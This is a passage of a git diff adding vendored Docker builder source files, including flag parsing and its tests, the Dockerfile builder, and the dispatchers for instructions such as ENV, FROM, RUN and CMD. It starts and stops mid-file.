AddBool(name string, def bool) *Flag { + flag := bf.addFlag(name, boolType) + if flag == nil { + return nil + } + if def { + flag.Value = "true" + } else { + flag.Value = "false" + } + return flag +} + +// AddString adds a string flag to BFlags +// Note, any error will be generated when Parse() is called (see Parse). +func (bf *BFlags) AddString(name string, def string) *Flag { + flag := bf.addFlag(name, stringType) + if flag == nil { + return nil + } + flag.Value = def + return flag +} + +// addFlag is a generic func used by the other AddXXX() func +// to add a new flag to the BFlags struct. +// Note, any error will be generated when Parse() is called (see Parse). +func (bf *BFlags) addFlag(name string, flagType FlagType) *Flag { + if _, ok := bf.flags[name]; ok { + bf.Err = fmt.Errorf("Duplicate flag defined: %s", name) + return nil + } + + newFlag := &Flag{ + bf: bf, + name: name, + flagType: flagType, + } + bf.flags[name] = newFlag + + return newFlag +} + +// IsUsed checks if the flag is used +func (fl *Flag) IsUsed() bool { + if _, ok := fl.bf.used[fl.name]; ok { + return true + } + return false +} + +// IsTrue checks if a bool flag is true +func (fl *Flag) IsTrue() bool { + if fl.flagType != boolType { + // Should never get here + panic(fmt.Errorf("Trying to use IsTrue on a non-boolean: %s", fl.name)) + } + return fl.Value == "true" +} + +// Parse parses and checks if the BFlags is valid. +// Any error noticed during the AddXXX() funcs will be generated/returned +// here. We do this because an error during AddXXX() is more like a +// compile time error so it doesn't matter too much when we stop our +// processing as long as we do stop it, so this allows the code +// around AddXXX() to be just: +// defFlag := AddString("description", "") +// w/o needing to add an if-statement around each one. +func (bf *BFlags) Parse() error { + // If there was an error while defining the possible flags + // go ahead and bubble it back up here since we didn't do it + // earlier in the processing + if bf.Err != nil { + return fmt.Errorf("Error setting up flags: %s", bf.Err) + } + + for _, arg := range bf.Args { + if !strings.HasPrefix(arg, "--") { + return fmt.Errorf("Arg should start with -- : %s", arg) + } + + if arg == "--" { + return nil + } + + arg = arg[2:] + value := "" + + index := strings.Index(arg, "=") + if index >= 0 { + value = arg[index+1:] + arg = arg[:index] + } + + flag, ok := bf.flags[arg] + if !ok { + return fmt.Errorf("Unknown flag: %s", arg) + } + + if _, ok = bf.used[arg]; ok { + return fmt.Errorf("Duplicate flag specified: %s", arg) + } + + bf.used[arg] = flag + + switch flag.flagType { + case boolType: + // value == "" is only ok if no "=" was specified + if index >= 0 && value == "" { + return fmt.Errorf("Missing a value on flag: %s", arg) + } + + lower := strings.ToLower(value) + if lower == "" { + flag.Value = "true" + } else if lower == "true" || lower == "false" { + flag.Value = lower + } else { + return fmt.Errorf("Expecting boolean value for flag %s, not: %s", arg, value) + } + + case stringType: + if index < 0 { + return fmt.Errorf("Missing a value on flag: %s", arg) + } + flag.Value = value + + default: + panic(fmt.Errorf("No idea what kind of flag we have! Should never get here!")) + } + + } + + return nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/bflag_test.go b/vendor/github.com/docker/docker/builder/dockerfile/bflag_test.go new file mode 100644 index 0000000000..65cfceadd0 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/bflag_test.go @@ -0,0 +1,187 @@ +package dockerfile + +import ( + "testing" +) + +func TestBuilderFlags(t *testing.T) { + var expected string + var err error + + // --- + + bf := NewBFlags() + bf.Args = []string{} + if err := bf.Parse(); err != nil { + t.Fatalf("Test1 of %q was supposed to work: %s", bf.Args, err) + } + + // --- + + bf = NewBFlags() + bf.Args = []string{"--"} + if err := bf.Parse(); err != nil { + t.Fatalf("Test2 of %q was supposed to work: %s", bf.Args, err) + } + + // --- + + bf = NewBFlags() + flStr1 := bf.AddString("str1", "") + flBool1 := bf.AddBool("bool1", false) + bf.Args = []string{} + if err = bf.Parse(); err != nil { + t.Fatalf("Test3 of %q was supposed to work: %s", bf.Args, err) + } + + if flStr1.IsUsed() == true { + t.Fatalf("Test3 - str1 was not used!") + } + if flBool1.IsUsed() == true { + t.Fatalf("Test3 - bool1 was not used!") + } + + // --- + + bf = NewBFlags() + flStr1 = bf.AddString("str1", "HI") + flBool1 = bf.AddBool("bool1", false) + bf.Args = []string{} + + if err = bf.Parse(); err != nil { + t.Fatalf("Test4 of %q was supposed to work: %s", bf.Args, err) + } + + if flStr1.Value != "HI" { + t.Fatalf("Str1 was supposed to default to: HI") + } + if flBool1.IsTrue() { + t.Fatalf("Bool1 was supposed to default to: false") + } + if flStr1.IsUsed() == true { + t.Fatalf("Str1 was not used!") + } + if flBool1.IsUsed() == true { + t.Fatalf("Bool1 was not used!") + } + + // --- + + bf = NewBFlags() + flStr1 = bf.AddString("str1", "HI") + bf.Args = []string{"--str1"} + + if err = bf.Parse(); err == nil { + t.Fatalf("Test %q was supposed to fail", bf.Args) + } + + // --- + + bf = NewBFlags() + flStr1 = bf.AddString("str1", "HI") + bf.Args = []string{"--str1="} + + if err = bf.Parse(); err != nil { + t.Fatalf("Test %q was supposed to work: %s", bf.Args, err) + } + + expected = "" + if flStr1.Value != expected { + t.Fatalf("Str1 (%q) should be: %q", flStr1.Value, expected) + } + + // --- + + bf = NewBFlags() + flStr1 = bf.AddString("str1", "HI") + bf.Args = []string{"--str1=BYE"} + + if err = bf.Parse(); err != nil { + t.Fatalf("Test %q was supposed to work: %s", bf.Args, err) + } + + expected = "BYE" + if flStr1.Value != expected { + t.Fatalf("Str1 (%q) should be: %q", flStr1.Value, expected) + } + + // --- + + bf = NewBFlags() + flBool1 = bf.AddBool("bool1", false) + bf.Args = []string{"--bool1"} + + if err = bf.Parse(); err != nil { + t.Fatalf("Test %q was supposed to work: %s", bf.Args, err) + } + + if !flBool1.IsTrue() { + t.Fatalf("Test-b1 Bool1 was supposed to be true") + } + + // --- + + bf = NewBFlags() + flBool1 = bf.AddBool("bool1", false) + bf.Args = []string{"--bool1=true"} + + if err = bf.Parse(); err != nil { + t.Fatalf("Test %q was supposed to work: %s", bf.Args, err) + } + + if !flBool1.IsTrue() { + t.Fatalf("Test-b2 Bool1 was supposed to be true") + } + + // --- + + bf = NewBFlags() + flBool1 = bf.AddBool("bool1", false) + bf.Args = []string{"--bool1=false"} + + if err = bf.Parse(); err != nil { + t.Fatalf("Test %q was supposed to work: %s", bf.Args, err) + } + + if flBool1.IsTrue() { + t.Fatalf("Test-b3 Bool1 was supposed to be false") + } + + // --- + + bf = NewBFlags() + flBool1 = bf.AddBool("bool1", false) + bf.Args = []string{"--bool1=false1"} + + if err = bf.Parse(); err == nil { + t.Fatalf("Test %q was supposed to fail", bf.Args) + } + + // --- + + bf = NewBFlags() + flBool1 = bf.AddBool("bool1", false) + bf.Args = []string{"--bool2"} + + if err = bf.Parse(); err == nil { + t.Fatalf("Test %q was supposed to fail", bf.Args) + } + + // --- + + bf = NewBFlags() + flStr1 = bf.AddString("str1", "HI") + flBool1 = bf.AddBool("bool1", false) + bf.Args = []string{"--bool1", "--str1=BYE"} + + if err = bf.Parse(); err != nil { + t.Fatalf("Test %q was supposed to work: %s", bf.Args, err) + } + + if flStr1.Value != "BYE" { + t.Fatalf("Teset %s, str1 should be BYE", bf.Args) + } + if !flBool1.IsTrue() { + t.Fatalf("Teset %s, bool1 should be true", bf.Args) + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/builder.go b/vendor/github.com/docker/docker/builder/dockerfile/builder.go new file mode 100644 index 0000000000..da43513fff --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/builder.go @@ -0,0 +1,370 @@ +package dockerfile + +import ( + "bytes" + "errors" + "fmt" + "io" + "io/ioutil" + "os" + "strings" + + "github.com/Sirupsen/logrus" + apierrors "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder" + "github.com/docker/docker/builder/dockerfile/parser" + "github.com/docker/docker/image" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/reference" + perrors "github.com/pkg/errors" + "golang.org/x/net/context" +) + +var validCommitCommands = map[string]bool{ + "cmd": true, + "entrypoint": true, + "healthcheck": true, + "env": true, + "expose": true, + "label": true, + "onbuild": true, + "user": true, + "volume": true, + "workdir": true, +} + +// BuiltinAllowedBuildArgs is list of built-in allowed build args +var BuiltinAllowedBuildArgs = map[string]bool{ + "HTTP_PROXY": true, + "http_proxy": true, + "HTTPS_PROXY": true, + "https_proxy": true, + "FTP_PROXY": true, + "ftp_proxy": true, + "NO_PROXY": true, + "no_proxy": true, +} + +// Builder is a Dockerfile builder +// It implements the builder.Backend interface. +type Builder struct { + options *types.ImageBuildOptions + + Stdout io.Writer + Stderr io.Writer + Output io.Writer + + docker builder.Backend + context builder.Context + clientCtx context.Context + cancel context.CancelFunc + + dockerfile *parser.Node + runConfig *container.Config // runconfig for cmd, run, entrypoint etc. + flags *BFlags + tmpContainers map[string]struct{} + image string // imageID + noBaseImage bool + maintainer string + cmdSet bool + disableCommit bool + cacheBusted bool + allowedBuildArgs map[string]bool // list of build-time args that are allowed for expansion/substitution and passing to commands in 'run'. + directive parser.Directive + + // TODO: remove once docker.Commit can receive a tag + id string + + imageCache builder.ImageCache + from builder.Image +} + +// BuildManager implements builder.Backend and is shared across all Builder objects. +type BuildManager struct { + backend builder.Backend +} + +// NewBuildManager creates a BuildManager. +func NewBuildManager(b builder.Backend) (bm *BuildManager) { + return &BuildManager{backend: b} +} + +// BuildFromContext builds a new image from a given context. +func (bm *BuildManager) BuildFromContext(ctx context.Context, src io.ReadCloser, remote string, buildOptions *types.ImageBuildOptions, pg backend.ProgressWriter) (string, error) { + if buildOptions.Squash && !bm.backend.HasExperimental() { + return "", apierrors.NewBadRequestError(errors.New("squash is only supported with experimental mode")) + } + buildContext, dockerfileName, err := builder.DetectContextFromRemoteURL(src, remote, pg.ProgressReaderFunc) + if err != nil { + return "", err + } + defer func() { + if err := buildContext.Close(); err != nil { + logrus.Debugf("[BUILDER] failed to remove temporary context: %v", err) + } + }() + + if len(dockerfileName) > 0 { + buildOptions.Dockerfile = dockerfileName + } + b, err := NewBuilder(ctx, buildOptions, bm.backend, builder.DockerIgnoreContext{ModifiableContext: buildContext}, nil) + if err != nil { + return "", err + } + return b.build(pg.StdoutFormatter, pg.StderrFormatter, pg.Output) +} + +// NewBuilder creates a new Dockerfile builder from an optional dockerfile and a Config. +// If dockerfile is nil, the Dockerfile specified by Config.DockerfileName, +// will be read from the Context passed to Build(). +func NewBuilder(clientCtx context.Context, config *types.ImageBuildOptions, backend builder.Backend, buildContext builder.Context, dockerfile io.ReadCloser) (b *Builder, err error) { + if config == nil { + config = new(types.ImageBuildOptions) + } + if config.BuildArgs == nil { + config.BuildArgs = make(map[string]*string) + } + ctx, cancel := context.WithCancel(clientCtx) + b = &Builder{ + clientCtx: ctx, + cancel: cancel, + options: config, + Stdout: os.Stdout, + Stderr: os.Stderr, + docker: backend, + context: buildContext, + runConfig: new(container.Config), + tmpContainers: map[string]struct{}{}, + id: stringid.GenerateNonCryptoID(), + allowedBuildArgs: make(map[string]bool), + directive: parser.Directive{ + EscapeSeen: false, + LookingForDirectives: true, + }, + } + if icb, ok := backend.(builder.ImageCacheBuilder); ok { + b.imageCache = icb.MakeImageCache(config.CacheFrom) + } + + parser.SetEscapeToken(parser.DefaultEscapeToken, &b.directive) // Assume the default token for escape + + if dockerfile != nil { + b.dockerfile, err = parser.Parse(dockerfile, &b.directive) + if err != nil { + return nil, err + } + } + + return b, nil +} + +// sanitizeRepoAndTags parses the raw "t" parameter received from the client +// to a slice of repoAndTag. +// It also validates each repoName and tag. +func sanitizeRepoAndTags(names []string) ([]reference.Named, error) { + var ( + repoAndTags []reference.Named + // This map is used for deduplicating the "-t" parameter. + uniqNames = make(map[string]struct{}) + ) + for _, repo := range names { + if repo == "" { + continue + } + + ref, err := reference.ParseNamed(repo) + if err != nil { + return nil, err + } + + ref = reference.WithDefaultTag(ref) + + if _, isCanonical := ref.(reference.Canonical); isCanonical { + return nil, errors.New("build tag cannot contain a digest") + } + + if _, isTagged := ref.(reference.NamedTagged); !isTagged { + ref, err = reference.WithTag(ref, reference.DefaultTag) + if err != nil { + return nil, err + } + } + + nameWithTag := ref.String() + + if _, exists := uniqNames[nameWithTag]; !exists { + uniqNames[nameWithTag] = struct{}{} + repoAndTags = append(repoAndTags, ref) + } + } + return repoAndTags, nil +} + +// build runs the Dockerfile builder from a context and a docker object that allows to make calls +// to Docker. +// +// This will (barring errors): +// +// * read the dockerfile from context +// * parse the dockerfile if not already parsed +// * walk the AST and execute it by dispatching to handlers. If Remove +// or ForceRemove is set, additional cleanup around containers happens after +// processing. +// * Tag image, if applicable. +// * Print a happy message and return the image ID. +// +func (b *Builder) build(stdout io.Writer, stderr io.Writer, out io.Writer) (string, error) { + b.Stdout = stdout + b.Stderr = stderr + b.Output = out + + // If Dockerfile was not parsed yet, extract it from the Context + if b.dockerfile == nil { + if err := b.readDockerfile(); err != nil { + return "", err + } + } + + repoAndTags, err := sanitizeRepoAndTags(b.options.Tags) + if err != nil { + return "", err + } + + if len(b.options.Labels) > 0 { + line := "LABEL " + for k, v := range b.options.Labels { + line += fmt.Sprintf("%q='%s' ", k, v) + } + _, node, err := parser.ParseLine(line, &b.directive, false) + if err != nil { + return "", err + } + b.dockerfile.Children = append(b.dockerfile.Children, node) + } + + var shortImgID string + total := len(b.dockerfile.Children) + for _, n := range b.dockerfile.Children { + if err := b.checkDispatch(n, false); err != nil { + return "", err + } + } + + for i, n := range b.dockerfile.Children { + select { + case <-b.clientCtx.Done(): + logrus.Debug("Builder: build cancelled!") + fmt.Fprintf(b.Stdout, "Build cancelled") + return "", fmt.Errorf("Build cancelled") + default: + // Not cancelled yet, keep going... + } + + if err := b.dispatch(i, total, n); err != nil { + if b.options.ForceRemove { + b.clearTmp() + } + return "", err + } + + shortImgID = stringid.TruncateID(b.image) + fmt.Fprintf(b.Stdout, " ---> %s\n", shortImgID) + if b.options.Remove { + b.clearTmp() + } + } + + // check if there are any leftover build-args that were passed but not + // consumed during build. Return a warning, if there are any. + leftoverArgs := []string{} + for arg := range b.options.BuildArgs { + if !b.isBuildArgAllowed(arg) { + leftoverArgs = append(leftoverArgs, arg) + } + } + + if len(leftoverArgs) > 0 { + fmt.Fprintf(b.Stderr, "[Warning] One or more build-args %v were not consumed\n", leftoverArgs) + } + + if b.image == "" { + return "", fmt.Errorf("No image was generated. Is your Dockerfile empty?") + } + + if b.options.Squash { + var fromID string + if b.from != nil { + fromID = b.from.ImageID() + } + b.image, err = b.docker.SquashImage(b.image, fromID) + if err != nil { + return "", perrors.Wrap(err, "error squashing image") + } + } + + imageID := image.ID(b.image) + for _, rt := range repoAndTags { + if err := b.docker.TagImageWithReference(imageID, rt); err != nil { + return "", err + } + } + + fmt.Fprintf(b.Stdout, "Successfully built %s\n", shortImgID) + return b.image, nil +} + +// Cancel cancels an ongoing Dockerfile build. +func (b *Builder) Cancel() { + b.cancel() +} + +// BuildFromConfig builds directly from `changes`, treating it as if it were the contents of a Dockerfile +// It will: +// - Call parse.Parse() to get an AST root for the concatenated Dockerfile entries. +// - Do build by calling builder.dispatch() to call all entries' handling routines +// +// BuildFromConfig is used by the /commit endpoint, with the changes +// coming from the query parameter of the same name. +// +// TODO: Remove? +func BuildFromConfig(config *container.Config, changes []string) (*container.Config, error) { + b, err := NewBuilder(context.Background(), nil, nil, nil, nil) + if err != nil { + return nil, err + } + + ast, err := parser.Parse(bytes.NewBufferString(strings.Join(changes, "\n")), &b.directive) + if err != nil { + return nil, err + } + + // ensure that the commands are valid + for _, n := range ast.Children { + if !validCommitCommands[n.Value] { + return nil, fmt.Errorf("%s is not a valid change command", n.Value) + } + } + + b.runConfig = config + b.Stdout = ioutil.Discard + b.Stderr = ioutil.Discard + b.disableCommit = true + + total := len(ast.Children) + for _, n := range ast.Children { + if err := b.checkDispatch(n, false); err != nil { + return nil, err + } + } + + for i, n := range ast.Children { + if err := b.dispatch(i, total, n); err != nil { + return nil, err + } + } + + return b.runConfig, nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go new file mode 100644 index 0000000000..76a7ce74f9 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go @@ -0,0 +1,5 @@ +// +build !windows + +package dockerfile + +var defaultShell = []string{"/bin/sh", "-c"} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go new file mode 100644 index 0000000000..37e9fbcf4b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go @@ -0,0 +1,3 @@ +package dockerfile + +var defaultShell = []string{"cmd", "/S", "/C"} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/command/command.go b/vendor/github.com/docker/docker/builder/dockerfile/command/command.go new file mode 100644 index 0000000000..f23c6874b5 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/command/command.go @@ -0,0 +1,46 @@ +// Package command contains the set of Dockerfile commands. +package command + +// Define constants for the command strings +const ( + Add = "add" + Arg = "arg" + Cmd = "cmd" + Copy = "copy" + Entrypoint = "entrypoint" + Env = "env" + Expose = "expose" + From = "from" + Healthcheck = "healthcheck" + Label = "label" + Maintainer = "maintainer" + Onbuild = "onbuild" + Run = "run" + Shell = "shell" + StopSignal = "stopsignal" + User = "user" + Volume = "volume" + Workdir = "workdir" +) + +// Commands is list of all Dockerfile commands +var Commands = map[string]struct{}{ + Add: {}, + Arg: {}, + Cmd: {}, + Copy: {}, + Entrypoint: {}, + Env: {}, + Expose: {}, + From: {}, + Healthcheck: {}, + Label: {}, + Maintainer: {}, + Onbuild: {}, + Run: {}, + Shell: {}, + StopSignal: {}, + User: {}, + Volume: {}, + Workdir: {}, +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go new file mode 100644 index 0000000000..3e78abdd68 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go @@ -0,0 +1,821 @@ +package dockerfile + +// This file contains the dispatchers for each command. Note that +// `nullDispatch` is not actually a command, but support for commands we parse +// but do nothing with. +// +// See evaluator.go for a higher level discussion of the whole evaluator +// package. + +import ( + "fmt" + "regexp" + "runtime" + "sort" + "strconv" + "strings" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/docker/builder" + "github.com/docker/docker/pkg/signal" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/go-connections/nat" +) + +// ENV foo bar +// +// Sets the environment variable foo to bar, also makes interpolation +// in the dockerfile available from the next statement on via ${foo}. +// +func env(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) == 0 { + return errAtLeastOneArgument("ENV") + } + + if len(args)%2 != 0 { + // should never get here, but just in case + return errTooManyArguments("ENV") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + // TODO/FIXME/NOT USED + // Just here to show how to use the builder flags stuff within the + // context of a builder command. Will remove once we actually add + // a builder command to something! + /* + flBool1 := b.flags.AddBool("bool1", false) + flStr1 := b.flags.AddString("str1", "HI") + + if err := b.flags.Parse(); err != nil { + return err + } + + fmt.Printf("Bool1:%v\n", flBool1) + fmt.Printf("Str1:%v\n", flStr1) + */ + + commitStr := "ENV" + + for j := 0; j < len(args); j++ { + // name ==> args[j] + // value ==> args[j+1] + + if len(args[j]) == 0 { + return errBlankCommandNames("ENV") + } + newVar := args[j] + "=" + args[j+1] + "" + commitStr += " " + newVar + + gotOne := false + for i, envVar := range b.runConfig.Env { + envParts := strings.SplitN(envVar, "=", 2) + compareFrom := envParts[0] + compareTo := args[j] + if runtime.GOOS == "windows" { + // Case insensitive environment variables on Windows + compareFrom = strings.ToUpper(compareFrom) + compareTo = strings.ToUpper(compareTo) + } + if compareFrom == compareTo { + b.runConfig.Env[i] = newVar + gotOne = true + break + } + } + if !gotOne { + b.runConfig.Env = append(b.runConfig.Env, newVar) + } + j++ + } + + return b.commit("", b.runConfig.Cmd, commitStr) +} + +// MAINTAINER some text +// +// Sets the maintainer metadata. +func maintainer(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) != 1 { + return errExactlyOneArgument("MAINTAINER") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + b.maintainer = args[0] + return b.commit("", b.runConfig.Cmd, fmt.Sprintf("MAINTAINER %s", b.maintainer)) +} + +// LABEL some json data describing the image +// +// Sets the Label variable foo to bar, +// +func label(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) == 0 { + return errAtLeastOneArgument("LABEL") + } + if len(args)%2 != 0 { + // should never get here, but just in case + return errTooManyArguments("LABEL") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + commitStr := "LABEL" + + if b.runConfig.Labels == nil { + b.runConfig.Labels = map[string]string{} + } + + for j := 0; j < len(args); j++ { + // name ==> args[j] + // value ==> args[j+1] + + if len(args[j]) == 0 { + return errBlankCommandNames("LABEL") + } + + newVar := args[j] + "=" + args[j+1] + "" + commitStr += " " + newVar + + b.runConfig.Labels[args[j]] = args[j+1] + j++ + } + return b.commit("", b.runConfig.Cmd, commitStr) +} + +// ADD foo /path +// +// Add the file 'foo' to '/path'. Tarball and Remote URL (git, http) handling +// exist here. If you do not wish to have this automatic handling, use COPY. +// +func add(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) < 2 { + return errAtLeastTwoArguments("ADD") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + return b.runContextCommand(args, true, true, "ADD") +} + +// COPY foo /path +// +// Same as 'ADD' but without the tar and remote url handling. +// +func dispatchCopy(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) < 2 { + return errAtLeastTwoArguments("COPY") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + return b.runContextCommand(args, false, false, "COPY") +} + +// FROM imagename +// +// This sets the image the dockerfile will build on top of. +// +func from(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) != 1 { + return errExactlyOneArgument("FROM") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + name := args[0] + + var ( + image builder.Image + err error + ) + + // Windows cannot support a container with no base image. + if name == api.NoBaseImageSpecifier { + if runtime.GOOS == "windows" { + return fmt.Errorf("Windows does not support FROM scratch") + } + b.image = "" + b.noBaseImage = true + } else { + // TODO: don't use `name`, instead resolve it to a digest + if !b.options.PullParent { + image, err = b.docker.GetImageOnBuild(name) + // TODO: shouldn't we error out if error is different from "not found" ? + } + if image == nil { + image, err = b.docker.PullOnBuild(b.clientCtx, name, b.options.AuthConfigs, b.Output) + if err != nil { + return err + } + } + } + b.from = image + + return b.processImageFrom(image) +} + +// ONBUILD RUN echo yo +// +// ONBUILD triggers run when the image is used in a FROM statement. +// +// ONBUILD handling has a lot of special-case functionality, the heading in +// evaluator.go and comments around dispatch() in the same file explain the +// special cases. search for 'OnBuild' in internals.go for additional special +// cases. +// +func onbuild(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) == 0 { + return errAtLeastOneArgument("ONBUILD") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + triggerInstruction := strings.ToUpper(strings.TrimSpace(args[0])) + switch triggerInstruction { + case "ONBUILD": + return fmt.Errorf("Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed") + case "MAINTAINER", "FROM": + return fmt.Errorf("%s isn't allowed as an ONBUILD trigger", triggerInstruction) + } + + original = regexp.MustCompile(`(?i)^\s*ONBUILD\s*`).ReplaceAllString(original, "") + + b.runConfig.OnBuild = append(b.runConfig.OnBuild, original) + return b.commit("", b.runConfig.Cmd, fmt.Sprintf("ONBUILD %s", original)) +} + +// WORKDIR /tmp +// +// Set the working directory for future RUN/CMD/etc statements. +// +func workdir(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) != 1 { + return errExactlyOneArgument("WORKDIR") + } + + err := b.flags.Parse() + if err != nil { + return err + } + + // This is from the Dockerfile and will not necessarily be in platform + // specific semantics, hence ensure it is converted. + b.runConfig.WorkingDir, err = normaliseWorkdir(b.runConfig.WorkingDir, args[0]) + if err != nil { + return err + } + + // For performance reasons, we explicitly do a create/mkdir now + // This avoids having an unnecessary expensive mount/unmount calls + // (on Windows in particular) during each container create. + // Prior to 1.13, the mkdir was deferred and not executed at this step. + if b.disableCommit { + // Don't call back into the daemon if we're going through docker commit --change "WORKDIR /foo". + // We've already updated the runConfig and that's enough. + return nil + } + b.runConfig.Image = b.image + + cmd := b.runConfig.Cmd + comment := "WORKDIR " + b.runConfig.WorkingDir + // reset the command for cache detection + b.runConfig.Cmd = strslice.StrSlice(append(getShell(b.runConfig), "#(nop) "+comment)) + defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd) + + if hit, err := b.probeCache(); err != nil { + return err + } else if hit { + return nil + } + + container, err := b.docker.ContainerCreate(types.ContainerCreateConfig{Config: b.runConfig}) + if err != nil { + return err + } + b.tmpContainers[container.ID] = struct{}{} + if err := b.docker.ContainerCreateWorkdir(container.ID); err != nil { + return err + } + + return b.commit(container.ID, cmd, comment) +} + +// RUN some command yo +// +// run a command and commit the image. Args are automatically prepended with +// the current SHELL which defaults to 'sh -c' under linux or 'cmd /S /C' under +// Windows, in the event there is only one argument The difference in processing: +// +// RUN echo hi # sh -c echo hi (Linux) +// RUN echo hi # cmd /S /C echo hi (Windows) +// RUN [ "echo", "hi" ] # echo hi +// +func run(b *Builder, args []string, attributes map[string]bool, original string) error { + if b.image == "" && !b.noBaseImage { + return fmt.Errorf("Please provide a source image with `from` prior to run") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + args = handleJSONArgs(args, attributes) + + if !attributes["json"] { + args = append(getShell(b.runConfig), args...) + } + config := &container.Config{ + Cmd: strslice.StrSlice(args), + Image: b.image, + } + + // stash the cmd + cmd := b.runConfig.Cmd + if len(b.runConfig.Entrypoint) == 0 && len(b.runConfig.Cmd) == 0 { + b.runConfig.Cmd = config.Cmd + } + + // stash the config environment + env := b.runConfig.Env + + defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd) + defer func(env []string) { b.runConfig.Env = env }(env) + + // derive the net build-time environment for this run. We let config + // environment override the build time environment. + // This means that we take the b.buildArgs list of env vars and remove + // any of those variables that are defined as part of the container. In other + // words, anything in b.Config.Env. What's left is the list of build-time env + // vars that we need to add to each RUN command - note the list could be empty. + // + // We don't persist the build time environment with container's config + // environment, but just sort and prepend it to the command string at time + // of commit. + // This helps with tracing back the image's actual environment at the time + // of RUN, without leaking it to the final image. It also aids cache + // lookup for same image built with same build time environment. + cmdBuildEnv := []string{} + configEnv := runconfigopts.ConvertKVStringsToMap(b.runConfig.Env) + for key, val := range b.options.BuildArgs { + if !b.isBuildArgAllowed(key) { + // skip build-args that are not in allowed list, meaning they have + // not been defined by an "ARG" Dockerfile command yet. + // This is an error condition but only if there is no "ARG" in the entire + // Dockerfile, so we'll generate any necessary errors after we parsed + // the entire file (see 'leftoverArgs' processing in evaluator.go ) + continue + } + if _, ok := configEnv[key]; !ok && val != nil { + cmdBuildEnv = append(cmdBuildEnv, fmt.Sprintf("%s=%s", key, *val)) + } + } + + // derive the command to use for probeCache() and to commit in this container. + // Note that we only do this if there are any build-time env vars. Also, we + // use the special argument "|#" at the start of the args array. This will + // avoid conflicts with any RUN command since commands can not + // start with | (vertical bar). The "#" (number of build envs) is there to + // help ensure proper cache matches. We don't want a RUN command + // that starts with "foo=abc" to be considered part of a build-time env var. + saveCmd := config.Cmd + if len(cmdBuildEnv) > 0 { + sort.Strings(cmdBuildEnv) + tmpEnv := append([]string{fmt.Sprintf("|%d", len(cmdBuildEnv))}, cmdBuildEnv...) + saveCmd = strslice.StrSlice(append(tmpEnv, saveCmd...)) + } + + b.runConfig.Cmd = saveCmd + hit, err := b.probeCache() + if err != nil { + return err + } + if hit { + return nil + } + + // set Cmd manually, this is special case only for Dockerfiles + b.runConfig.Cmd = config.Cmd + // set build-time environment for 'run'. + b.runConfig.Env = append(b.runConfig.Env, cmdBuildEnv...) + // set config as already being escaped, this prevents double escaping on windows + b.runConfig.ArgsEscaped = true + + logrus.Debugf("[BUILDER] Command to be executed: %v", b.runConfig.Cmd) + + cID, err := b.create() + if err != nil { + return err + } + + if err := b.run(cID); err != nil { + return err + } + + // revert to original config environment and set the command string to + // have the build-time env vars in it (if any) so that future cache look-ups + // properly match it. + b.runConfig.Env = env + b.runConfig.Cmd = saveCmd + return b.commit(cID, cmd, "run") +} + +// CMD foo +// +// Set the default command to run in the container (which may be empty). +// Argument handling is the same as RUN. +// +func cmd(b *Builder, args []string, attributes map[string]bool, original string) error { + if err := b.flags.Parse(); err != nil { + return err + } + + cmdSlice := handleJSONArgs(args, attributes) + + if !attributes["json"] { + cmdSlice = append(getShell(b.runConfig), cmdSlice...) + } + + b.runConfig.Cmd = strslice.StrSlice(cmdSlice) + // set config as already being escaped, this prevents double escaping on windows + b.runConfig.ArgsEscaped = true + + if err := b.commit("", b.runConfig.Cmd, fmt.Sprintf("CMD %q", cmdSlice)); err != nil { + return err + } + + if len(args) != 0 { + b.cmdSet = true + } + + return nil +} + +// parseOptInterval(flag) is the duration of flag.Value, or 0 if +// empty. An error is reported if the value is given and is not positive. +func parseOptInterval(f *Flag) (time.Duration, error) { + s := f.Value + if s == "" { + return 0, nil + } + d, err := time.ParseDuration(s) + if err != nil { + return 0, err + } + if d <= 0 { + return 0, fmt.Errorf("Interval %#v must be positive", f.name) + } + return d, nil +} + +// HEALTHCHECK foo +// +// Set the default healthcheck command to run in the container (which may be empty). +// Argument handling is the same as RUN. +// +func healthcheck(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) == 0 { + return 